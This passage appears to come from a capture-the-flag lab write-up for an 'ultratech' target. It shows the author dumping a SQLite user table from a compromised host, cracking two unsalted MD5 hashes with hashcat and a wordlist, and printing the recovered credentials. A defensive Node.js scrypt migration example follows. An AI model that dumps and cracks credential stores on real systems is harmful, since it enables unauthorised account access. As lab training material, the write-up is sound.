Database


Checking the database file after performing system enumeration

www@ultratech-prod:~/api$ ll
total 80
drwxr-xr-x   3 www www  4096 Jul 22 17:05 ./
drwxr-xr-x   9 www www  4096 Jul 22 17:07 ../
-rw-r--r--   1 www www  1750 Mar 22  2019 index.js
drwxrwxr-x 163 www www  4096 Mar 22  2019 node_modules/
-rw-r--r--   1 www www   370 Mar 22  2019 package.json
-rw-r--r--   1 www www 42702 Mar 22  2019 package-lock.json
-rwxr-xr-x   1 www www   194 Jul 22 16:32 shell*
-rw-rw-r--   1 www www   103 Mar 22  2019 start.sh
-rw-r--r--   1 www www  8192 Mar 22  2019 utech.db.sqlite

It uses SQLite

www@ultratech-prod:~/api$ cat utech.db.sqlite
zz��etableusersusersCREATE TABLE users (
            login Varchar,
            password Varchar,
            type Int
���(r00tf357a0c52799563c7c7b76c1e7543a32)admin0d0ea5111e3c1def594c1684e3b9be84

The utech.db.sqlite file is in a binary format. This was also partially detected by PEAS earlier.

www@ultratech-prod:~/api$ strings utech.db.sqlite 
SQLite format 3
etableusersusers
CREATE TABLE users (
            login Varchar,
            password Varchar,
            type Int
        )
r00tf357a0c52799563c7c7b76c1e7543a32
admin0d0ea5111e3c1def594c1684e3b9be84

I can use strings to see it better. Those are the credential hashes.

Password Cracking


┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ hashcat -a 0 -m 0 ./hashes /usr/share/wordlists/rockyou.txt             
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 2 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386
 
f357a0c52799563c7c7b76c1e7543a32:n100906                  
0d0ea5111e3c1def594c1684e3b9be84:mrsheafy                 
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: ./hashes
Time.Started.....: Mon Jul 22 19:19:46 2024 (1 sec)
Time.Estimated...: Mon Jul 22 19:19:47 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4144.1 kH/s (0.11ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 2/2 (100.00%) Digests (total), 2/2 (100.00%) Digests (new)
Progress.........: 5345280/14344386 (37.26%)
Rejected.........: 0/5345280 (0.00%)
Restore.Point....: 5342208/14344386 (37.24%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: mrswhite1 -> mrsburks4
Hardware.Mon.#1..: Util: 31%
 
Started: Mon Jul 22 19:19:44 2024
Stopped: Mon Jul 22 19:19:48 2024

Password hashes cracked: r00t:n100906 and admin:mrsheafy

r00t is a system user. The password might be reused.
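
An added example, not part of the original write-up or the target application's code: hashcat identified the stored values as unsalted MD5 (mode 0) and recovered both within seconds, so this Node.js code shows one way a users table like this could store passwords with per-user salted scrypt and upgrade legacy MD5 rows at login. The row object shape, the record format and the cost parameters are assumptions.

```javascript
const nodeCrypto = require("node:crypto");

// Assumed cost parameters (16 MiB of memory per guess); tune for your hardware.
const SCRYPT = { N: 16384, r: 8, p: 1, keylen: 32 };

// Legacy scheme as seen in utech.db.sqlite: bare MD5 hex digest, no salt.
function legacyMd5(password) {
  return nodeCrypto.createHash("md5").update(password, "utf8").digest("hex");
}

// Hardened record "scrypt$N$r$p$saltHex$keyHex" with a fresh 16-byte salt per user.
function hashPassword(password) {
  const { N, r, p, keylen } = SCRYPT;
  const salt = nodeCrypto.randomBytes(16);
  const key = nodeCrypto.scryptSync(password, salt, keylen, { N, r, p });
  return ["scrypt", N, r, p, salt.toString("hex"), key.toString("hex")].join("$");
}

function verifyScrypt(password, stored) {
  const parts = stored.split("$");
  if (parts.length !== 6 || parts[0] !== "scrypt") return false;
  const [, N, r, p, saltHex, keyHex] = parts;
  const expected = Buffer.from(keyHex, "hex");
  // Reject truncated records; an empty key would otherwise compare equal.
  if (expected.length !== SCRYPT.keylen) return false;
  const actual = nodeCrypto.scryptSync(password, Buffer.from(saltHex, "hex"),
    expected.length, { N: Number(N), r: Number(r), p: Number(p) });
  return nodeCrypto.timingSafeEqual(actual, expected);
}

// Login check that replaces a legacy MD5 digest after one successful login.
// `user` is a hypothetical row object { login, password }.
function login(user, password) {
  if (user.password.startsWith("scrypt$")) return verifyScrypt(password, user.password);
  const given = Buffer.from(legacyMd5(password), "hex");
  const stored = Buffer.from(user.password, "hex");
  if (given.length !== stored.length || !nodeCrypto.timingSafeEqual(given, stored)) {
    return false;
  }
  user.password = hashPassword(password); // the MD5 digest is no longer kept
  return true;
}
```

Rows that never log in again keep their MD5 digest, so a migration like this is normally paired with a forced reset for accounts that stay on the legacy format.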